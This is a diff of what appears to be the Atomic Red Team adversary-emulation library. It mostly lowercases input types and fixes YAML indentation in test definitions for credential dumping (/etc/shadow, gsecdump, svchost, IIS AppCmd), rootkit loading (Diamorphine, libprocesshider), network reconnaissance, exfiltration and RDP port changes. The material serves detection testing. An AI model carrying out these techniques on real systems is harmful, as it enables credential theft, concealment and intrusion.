 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
@@ -10,7 +10,7 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.008.txt
  executor:
    command: |
@@ -29,7 +29,7 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.008.txt
  executor:
    command: |
@@ -43,11 +43,11 @@ atomic_tests:
  description: |
    Dump /etc/passwd and /etc/shadow using ed
  supported_platforms:
-    - linux
+  - linux
  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.008.txt
  executor:
    command: |
@@ -61,11 +61,11 @@ atomic_tests:
  description: |
    Dump /etc/passwd and /etc/shadow using bash builtins
  supported_platforms:
-    - linux
+  - linux
  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.008.txt
  executor:
    command: |
@@ -44,9 +44,9 @@ If you see a message saying "The system cannot find the path specified", try usi
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
-| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
-| gsecdump_url | Path to download Gsecdump binary file | Url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
+| gsecdump_exe | Path to the Gsecdump executable | path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
+| gsecdump_bin_hash | File hash of the Gsecdump binary file | string | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
+| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -18,15 +18,15 @@ atomic_tests:
  input_arguments:
    gsecdump_exe:
      description: Path to the Gsecdump executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
    gsecdump_bin_hash:
      description: File hash of the Gsecdump binary file
-      type: String
+      type: string
      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
    gsecdump_url:
      description: Path to download Gsecdump binary file
-      type: Url
+      type: url
      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
  dependency_executor_name: powershell
  dependencies:
@@ -58,7 +58,7 @@ atomic_tests:
  - windows
  dependency_executor_name: powershell
  dependencies:
-  - description: NPPSpy.dll must be available in local temp directory 
+  - description: NPPSpy.dll must be available in local temp directory
    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
    get_prereq_command: |-
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -85,13 +85,13 @@ atomic_tests:
      Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
    name: powershell
    elevation_required: true
-    
+
 - name: Dump svchost.exe to gather RDP credentials
  auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
  description: |
    The svchost.exe contains the RDP plain-text credentials.
    Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
-    
+
    Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
  supported_platforms:
  - windows
@@ -107,8 +107,8 @@ atomic_tests:
 - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
  auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
  description: |-
-   AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
-   [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+    AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+    [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
  supported_platforms:
  - windows
  dependency_executor_name: powershell
@@ -127,8 +127,8 @@ atomic_tests:
 - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
  auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
  description: |-
-   AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
-   [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+    AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+    [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
  supported_platforms:
  - windows
  dependency_executor_name: powershell
@@ -34,7 +34,7 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| volume | Drive letter of the volume to access | String | C:|
+| volume | Drive letter of the volume to access | string | C:|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -18,7 +18,7 @@ atomic_tests:
  input_arguments:
    volume:
      description: Drive letter of the volume to access
-      type: String
+      type: string
      default: 'C:'
  executor:
    command: |
@@ -64,7 +64,7 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path of file to hold net.exe output | Path | %temp%&#92;service-list.txt|
+| output_file | Path of file to hold net.exe output | path | %temp%&#92;service-list.txt|


 #### Attack Commands: Run with `command_prompt`! 
@@ -27,7 +27,7 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path of file to hold net.exe output
-      type: Path
+      type: path
      default: '%temp%\service-list.txt'
  executor:
    command: |
@@ -26,8 +26,8 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_source_code | Path to source of C# code | Path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
-| output_file_name | Name of output binary | String | %TEMP%&#92;T1010.exe|
+| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
+| output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -12,11 +12,11 @@ atomic_tests:
  input_arguments:
    input_source_code:
      description: Path to source of C# code
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1010\src\T1010.cs
    output_file_name:
      description: Name of output binary
-      type: String
+      type: string
      default: '%TEMP%\T1010.exe'
  dependency_executor_name: powershell
  dependencies:
@@ -82,7 +82,7 @@ See: https://www.mandiant.com/resources/hunting-com-objects
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | File to output list of COM objects to | String | $env:temp&#92;T1592.002Test1.txt|
+| output_file | File to output list of COM objects to | string | $env:temp&#92;T1592.002Test1.txt|


 #### Attack Commands: Run with `powershell`! 
@@ -39,15 +39,15 @@ atomic_tests:
 - name: Enumerate COM Objects in Registry with Powershell
  auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
  description: |-
-   This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
-   An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
-   See: https://www.mandiant.com/resources/hunting-com-objects
+    This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
+    An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
+    See: https://www.mandiant.com/resources/hunting-com-objects
  supported_platforms:
  - windows
  input_arguments:
    output_file:
      description: File to output list of COM objects to
-      type: String
+      type: string
      default: $env:temp\T1592.002Test1.txt
  executor:
    command: |
@@ -32,9 +32,9 @@ Loadable Kernel Module based Rootkit
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | Path | PathToAtomicsFolder/T1014/src/Linux|
-| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin|
-| rootkit_name | Module name | String | T1014|
+| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
+| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
+| rootkit_name | Module name | string | T1014|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -91,9 +91,9 @@ Loadable Kernel Module based Rootkit
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | Path | PathToAtomicsFolder/T1014/src/Linux|
-| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin|
-| rootkit_name | Module name | String | T1014|
+| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
+| rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
+| rootkit_name | Module name | string | T1014|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -151,9 +151,9 @@ Uses libprocesshider to simulate rootkit behavior by hiding a specific process n
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/|
-| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
-| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so|
+| repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/|
+| rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
+| library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -208,10 +208,10 @@ Loads Diamorphine kernel module, which hides itself and a processes.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/|
-| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9|
-| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine|
-| rootkit_name | Module name | String | diamorphine|
+| repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/|
+| rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9|
+| rootkit_path | Path To rootkit | string | /tmp/atomic/Diamorphine|
+| rootkit_name | Module name | string | diamorphine|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -10,15 +10,15 @@ atomic_tests:
  input_arguments:
    rootkit_source_path:
      description: Path to the rootkit source. Used when prerequistes are fetched.
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1014/src/Linux
    rootkit_path:
      description: Path To rootkit
-      type: String
+      type: string
      default: PathToAtomicsFolder/T1014/bin
    rootkit_name:
      description: Module name
-      type: String
+      type: string
      default: T1014
  dependency_executor_name: bash
  dependencies:
@@ -52,15 +52,15 @@ atomic_tests:
  input_arguments:
    rootkit_source_path:
      description: Path to the rootkit source. Used when prerequistes are fetched.
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1014/src/Linux
    rootkit_path:
      description: Path To rootkit
-      type: String
+      type: string
      default: PathToAtomicsFolder/T1014/bin
    rootkit_name:
      description: Module name
-      type: String
+      type: string
      default: T1014
  dependency_executor_name: bash
  dependencies:
@@ -95,15 +95,15 @@ atomic_tests:
  input_arguments:
    repo:
      description: Url of the github repo zip
-      type: String
+      type: string
      default: https://github.com/gianlucaborello/libprocesshider/
    rev:
      description: Revision of the github repo zip
-      type: String
+      type: string
      default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
    library_path:
      description: Full path of the library to add to ld.so.preload
-      type: String
+      type: string
      default: /usr/local/lib/libprocesshider.so
  dependency_executor_name: bash
  dependencies:
@@ -135,19 +135,19 @@ atomic_tests:
  input_arguments:
    repo:
      description: Url of the diamorphine github repo
-      type: String
+      type: string
      default: https://github.com/m0nad/Diamorphine/
    rev:
      description: Revision of the github repo zip
-      type: String
+      type: string
      default: 898810523aa2033f582a4a5903ffe453334044f9
    rootkit_path:
      description: Path To rootkit
-      type: String
+      type: string
      default: /tmp/atomic/Diamorphine
    rootkit_name:
      description: Module name
-      type: String
+      type: string
      default: diamorphine
  dependency_executor_name: bash
  dependencies:
@@ -189,9 +189,9 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
-| portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
-| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|
+| output_file | Path of file to write port scan results | path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
+| portfile_url | URL to top-128.txt | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
+| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|


 #### Attack Commands: Run with `powershell`! 
@@ -267,7 +267,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
+| adfind_path | Path to the AdFind executable | path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -312,7 +312,7 @@ A list of commands known to be performed by Qakbot for recon purposes
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
+| recon_commands | File that houses list of commands to be executed | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|


 #### Attack Commands: Run with `command_prompt`! 
@@ -80,15 +80,15 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path of file to write port scan results
-      type: Path
+      type: path
      default: $env:USERPROFILE\Desktop\open-ports.txt
    portfile_url:
      description: URL to top-128.txt
-      type: Url
+      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt
    port_file:
      description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap.
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1016\src\top-128.txt
  dependency_executor_name: powershell
  dependencies:
@@ -132,7 +132,7 @@ atomic_tests:
    name: powershell
 - name: Adfind - Enumerate Active Directory Subnet Objects
  auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
@@ -140,7 +140,7 @@ atomic_tests:
  input_arguments:
    adfind_path:
      description: Path to the AdFind executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
  dependency_executor_name: powershell
  dependencies:
@@ -163,7 +163,7 @@ atomic_tests:
  input_arguments:
    recon_commands:
      description: File that houses list of commands to be executed
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1016\src\qakbot.bat
  dependency_executor_name: powershell
  dependencies:
@@ -182,9 +182,9 @@ atomic_tests:
  auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
  description: |
    "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. 
-    
+
    Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. 
-    
+
    Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. 
  supported_platforms:
  - macos
@@ -203,5 +203,5 @@ atomic_tests:
  - windows
  executor:
    command: |
-       nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
+      nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
    name: command_prompt
@@ -130,7 +130,7 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_domain | Domain to query for domain controllers | String | %userdnsdomain%|
+| target_domain | Domain to query for domain controllers | string | %userdnsdomain%|


 #### Attack Commands: Run with `command_prompt`! 
@@ -165,9 +165,9 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| start_host | Last octet starting value for ping sweep. | String | 1|
-| stop_host | Last octet ending value for ping sweep. | String | 254|
-| subnet | Subnet used for ping sweep. | String | 192.168.1|
+| start_host | Last octet starting value for ping sweep. | string | 1|
+| stop_host | Last octet ending value for ping sweep. | string | 254|
+| subnet | Subnet used for ping sweep. | string | 192.168.1|


 #### Attack Commands: Run with `command_prompt`! 
@@ -274,9 +274,9 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| start_host | Subnet used for ping sweep. | String | 1|
-| stop_host | Subnet used for ping sweep. | String | 254|
-| subnet | Subnet used for ping sweep. | String | 192.168.1|
+| start_host | Subnet used for ping sweep. | string | 1|
+| stop_host | Subnet used for ping sweep. | string | 254|
+| subnet | Subnet used for ping sweep. | string | 192.168.1|


 #### Attack Commands: Run with `sh`! 
@@ -346,9 +346,9 @@ Successful execution of this test will list dns zones in the terminal.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user_name | username including domain. | String | domain&#92;user|
-| acct_pass | Account password. | String | password|
-| host_name | hostname or ip address to connect to. | String | 192.168.1.1|
+| user_name | username including domain. | string | domain&#92;user|
+| acct_pass | Account password. | string | password|
+| host_name | hostname or ip address to connect to. | string | 192.168.1.1|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -412,7 +412,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
+| adfind_path | Path to the AdFind executable | path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -458,7 +458,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
+| adfind_path | Path to the AdFind executable | path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -37,7 +37,7 @@ atomic_tests:
  input_arguments:
    target_domain:
      description: Domain to query for domain controllers
-      type: String
+      type: string
      default: '%userdnsdomain%'
  executor:
    command: |
@@ -51,21 +51,21 @@ atomic_tests:
    Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
  supported_platforms:
  - windows
-  input_arguments:                                                                                                                                         
-    start_host:                                                                                                                                            
-      description: Last octet starting value for ping sweep.                                                                                                             
-      type: String                                                                                                                                         
-      default: "1"                                                                                                                                         
-    stop_host:                                                                                                                                             
-      description: Last octet ending value for ping sweep.                                                                                                             
-      type: String                                                                                                                                         
-      default: "254"                                                                                                                                       
-    subnet:                                                                                                                  
-      description: Subnet used for ping sweep.                                                                               
-      type: String                                                                                                           
-      default: 192.168.1                                                                                                     
-  executor:                                                                                                                  
-    command: |                                                                                                               
+  input_arguments:
+    start_host:
+      description: Last octet starting value for ping sweep.
+      type: string
+      default: "1"
+    stop_host:
+      description: Last octet ending value for ping sweep.
+      type: string
+      default: "254"
+    subnet:
+      description: Subnet used for ping sweep.
+      type: string
+      default: 192.168.1
+  executor:
+    command: |
      for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i  
    name: command_prompt
 - name: Remote System Discovery - arp
@@ -113,15 +113,15 @@ atomic_tests:
  input_arguments:
    start_host:
      description: Subnet used for ping sweep.
-      type: String
+      type: string
      default: "1"
    stop_host:
      description: Subnet used for ping sweep.
-      type: String
+      type: string
      default: "254"
    subnet:
      description: Subnet used for ping sweep.
-      type: String
+      type: string
      default: 192.168.1
  executor:
    command: |
@@ -156,15 +156,15 @@ atomic_tests:
  input_arguments:
    user_name:
      description: username including domain.
-      type: String
+      type: string
      default: 'domain\user'
    acct_pass:
      description: Account password.
-      type: String
+      type: string
      default: "password"
    host_name:
      description: hostname or ip address to connect to.
-      type: String
+      type: string
      default: "192.168.1.1"
  dependency_executor_name: powershell
  dependencies:
@@ -193,7 +193,7 @@ atomic_tests:
    elevation_required: true
 - name: Adfind - Enumerate Active Directory Computer Objects
  auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
@@ -201,7 +201,7 @@ atomic_tests:
  input_arguments:
    adfind_path:
      description: Path to the AdFind executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
  dependency_executor_name: powershell
  dependencies:
@@ -217,7 +217,7 @@ atomic_tests:
    name: command_prompt
 - name: Adfind - Enumerate Active Directory Domain Controller Objects
  auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
-  description: | 
+  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
@@ -225,7 +225,7 @@ atomic_tests:
  input_arguments:
    adfind_path:
      description: Path to the AdFind executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
  dependency_executor_name: powershell
  dependencies:
@@ -307,9 +307,9 @@ atomic_tests:
  - windows
  dependency_executor_name: powershell
  dependencies:
-  - description: This PC must be joined to a domain. 
+  - description: This PC must be joined to a domain.
    prereq_command: |-
-     if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}		
+      if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
    get_prereq_command: |-
      write-host "This PC must be manually added to a domain." 
  executor:
@@ -373,7 +373,7 @@ atomic_tests:
    elevation_required: false
    command: |
      get-wmiobject -class ds_computer -namespace root\directory\ldap
- name: Remote System Discovery - net group Domain Controller 
+- name: Remote System Discovery - net group Domain Controller
  auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
  description: |
    Identify remote systems with net.exe querying the Active Directory Domain Controller.
@@ -28,8 +28,8 @@ Deletes a created file
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
-| domain | Destination Domain | Url | https://google.com|
+| file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
+| domain | Destination Domain | url | https://google.com|


 #### Attack Commands: Run with `powershell`! 
@@ -12,11 +12,11 @@ atomic_tests:
  input_arguments:
    file:
      description: Exfiltration File
-      type: String
+      type: string
      default: C:\temp\T1020_exfilFile.txt
    domain:
      description: Destination Domain
-      type: Url
+      type: url
      default: https://google.com
  executor:
    command: |-
@@ -32,10 +32,10 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
-| domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
-| username | Username argument default %username% | String | $ENV:USERNAME|
-| password | Password | String | 1password2!|
+| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
+| domain | domain argument default %USERDOMAIN% | string | $Env:USERDOMAIN|
+| username | Username argument default %username% | string | $ENV:USERNAME|
+| password | Password | string | 1password2!|


 #### Attack Commands: Run with `powershell`! 
@@ -90,8 +90,8 @@ Changing RDP Port to Non Standard Port via Powershell
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| OLD_Remote_Port | Default RDP Listening Port | String | 3389|
-| NEW_Remote_Port | New RDP Listening Port | String | 4489|
+| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
+| NEW_Remote_Port | New RDP Listening Port | string | 4489|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -130,8 +130,8 @@ Changing RDP Port to Non Standard Port via Command_Prompt
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| OLD_Remote_Port | Default RDP Listening Port | String | 3389|
-| NEW_Remote_Port | New RDP Listening Port | String | 4489|
+| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
+| NEW_Remote_Port | New RDP Listening Port | string | 4489|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -10,19 +10,19 @@ atomic_tests:
  input_arguments:
    logonserver:
      description: ComputerName argument default %logonserver%
-      type: String
+      type: string
      default: $ENV:logonserver.TrimStart("\")
    domain:
      description: domain argument default %USERDOMAIN%
-      type: String
+      type: string
      default: $Env:USERDOMAIN
    username:
      description: Username argument default %username%
-      type: String
+      type: string
      default: $ENV:USERNAME
    password:
      description: Password
-      type: String
+      type: string
      default: 1password2!
  dependencies:
  - description: |
@@ -48,15 +48,15 @@ atomic_tests:
  description: |
    Changing RDP Port to Non Standard Port via Powershell
  supported_platforms:
-    - windows
+  - windows
  input_arguments:
    OLD_Remote_Port:
      description: Default RDP Listening Port
-      type: String
+      type: string
      default: "3389"
    NEW_Remote_Port:
      description: New RDP Listening Port
-      type: String
+      type: string
      default: "4489"
  executor:
    command: |
@@ -66,21 +66,21 @@ atomic_tests:
      Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
      Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore 
    name: powershell
-    elevation_required: true 
+    elevation_required: true
 - name: Changing RDP Port to Non Standard Port via Command_Prompt
  auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
  description: |
    Changing RDP Port to Non Standard Port via Command_Prompt
  supported_platforms:
-    - windows
+  - windows
  input_arguments:
    OLD_Remote_Port:
      description: Default RDP Listening Port
-      type: String
+      type: string
      default: "3389"
    NEW_Remote_Port:
      description: New RDP Listening Port
-      type: String
+      type: string
      default: "4489"
  executor:
    command: |
@@ -90,4 +90,4 @@ atomic_tests:
      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
      netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
    name: command_prompt
-    elevation_required: true    
+    elevation_required: true
@@ -34,10 +34,10 @@ Connecting To Remote Shares
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user_name | Username | String | DOMAIN&#92;Administrator|
-| share_name | Examples C$, IPC$, Admin$ | String | C$|
-| password | Password | String | P@ssw0rd1|
-| computer_name | Target Computer Name | String | Target|
+| user_name | Username | string | DOMAIN&#92;Administrator|
+| share_name | Examples C$, IPC$, Admin$ | string | C$|
